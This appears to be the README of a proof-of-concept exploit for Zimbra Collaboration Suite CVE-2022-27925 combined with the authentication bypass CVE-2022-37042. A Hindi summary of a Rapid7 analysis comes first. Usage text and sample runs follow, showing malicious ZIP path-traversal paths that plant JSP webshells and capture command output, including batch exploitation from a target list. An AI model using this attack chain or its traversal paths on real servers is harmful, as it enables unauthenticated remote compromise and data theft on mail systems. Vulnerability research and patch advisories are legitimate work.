
PoC
10 मई, 2022 को, Zimbra ने Zimbra Collaboration Suite में कई कमजोरियों को संबोधित करने के लिए संस्करण 9.0.0 पैच 24 और 8.8.15 पैच 31 जारी किए, जिनमें CVE-2022-27924 (जिसके बारे में हमने पहले लिखा था) और CVE-2022-27925 शामिल हैं।
मूल रूप से, Zimbra ने CVE-2022-27925 को एक प्रमाणित पाथ-ट्रैवर्सल हमला बताया था, जहां एक प्रशासनिक उपयोगकर्ता Zimbra खाते के रूप में फाइल सिस्टम पर किसी भी निर्देशिका में फाइलें लिख सकता था। चूंकि इसे शुरू में केवल प्रशासक-विशेष हमला माना गया था, NVD ने इसे CVSS आधार स्कोर 7.8 प्रदान किया। बाद में, Volexity ने देखा कि इस कमजोरी का शोषण करने वाले हमलावरों ने प्रशासनिक आवश्यकताओं को बायपास करने का एक तरीका खोज लिया था, और इसके बारे में 10 अगस्त, 2022 को लिखा। इस नए प्रमाणीकरण बायपास को एक नया पहचानकर्ता मिला – CVE-2022-37042।
मूल पाथ-ट्रैवर्सल कमजोरी और नए प्रमाणीकरण बायपास को मिलाकर, हमलावर प्रशासक पोर्ट (डिफ़ॉल्ट रूप से, 7071) के माध्यम से किसी Zimbra Collaboration Suite सिस्टम से दूरस्थ रूप से अनाम रूप से समझौता कर सकते हैं। साथ ही, एक वर्तमान में अनपैच्ड विशेषाधिकार वृद्धि कमजोरी के साथ, जिसके बारे में हमने हाल ही में लिखा था और जिसके लिए एक एक्सप्लॉइट लिखा था, ये तीनों कमजोरियां अनपैच्ड सिस्टम पर रूट उपयोगकर्ता के रूप में दूरस्थ कमांड निष्पादन की ओर ले जाती हैं।
हालांकि सार्वजनिक सलाहों में इसका उल्लेख नहीं है, हमारे विश्लेषण के अनुसार, Zimbra Collaboration Suite Network Edition (भुगतान किया गया संस्करण) कमजोर है, और Open Source Edition (मुफ्त) नहीं है (क्योंकि इसमें कमजोर mboximport एंडपॉइंट नहीं है)। कमजोर संस्करण हैं:
Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)
इन कमजोरियों (और Zimbra की अन्य कमजोरियों) को जंगल में व्यापक शोषण के लिए निशाना बनाया जा रहा है, और इसलिए जितनी जल्दी हो सके इन्हें पैच या ऑफ़लाइन किया जाना चाहिए। यदि आपको संदेह है कि आपसे समझौता किया गया है, तो Zimbra आपके Zimbra Collaboration Suite सर्वर को बिना डेटा खोए नवीनतम पैच पर स्क्रैच से पुनर्निर्माण करने के चरण प्रदान करता है।
स्रोत: https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925
usage: exploit.py [-h] [-t TARGET] [-l LIST]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URl with protocol HTTPS
-l LIST, --list LIST List of targets
root@root# python exploit.py -t zimbra.example.com
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925 Sanan Qasim
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/BQOQBN.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
root@root# python exploit.py -l targets.txt
_____ _ __
/__ / (_)___ ___ / /_ _________ _
/ / / / __ `__ \/ __ \/ ___/ __ `/
/ /__/ / / / / / / /_/ / / / /_/ /
/____/_/_/ /_/ /_/_.___/_/ \__,_/
CVE-2022-27925 sanan Qasim
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable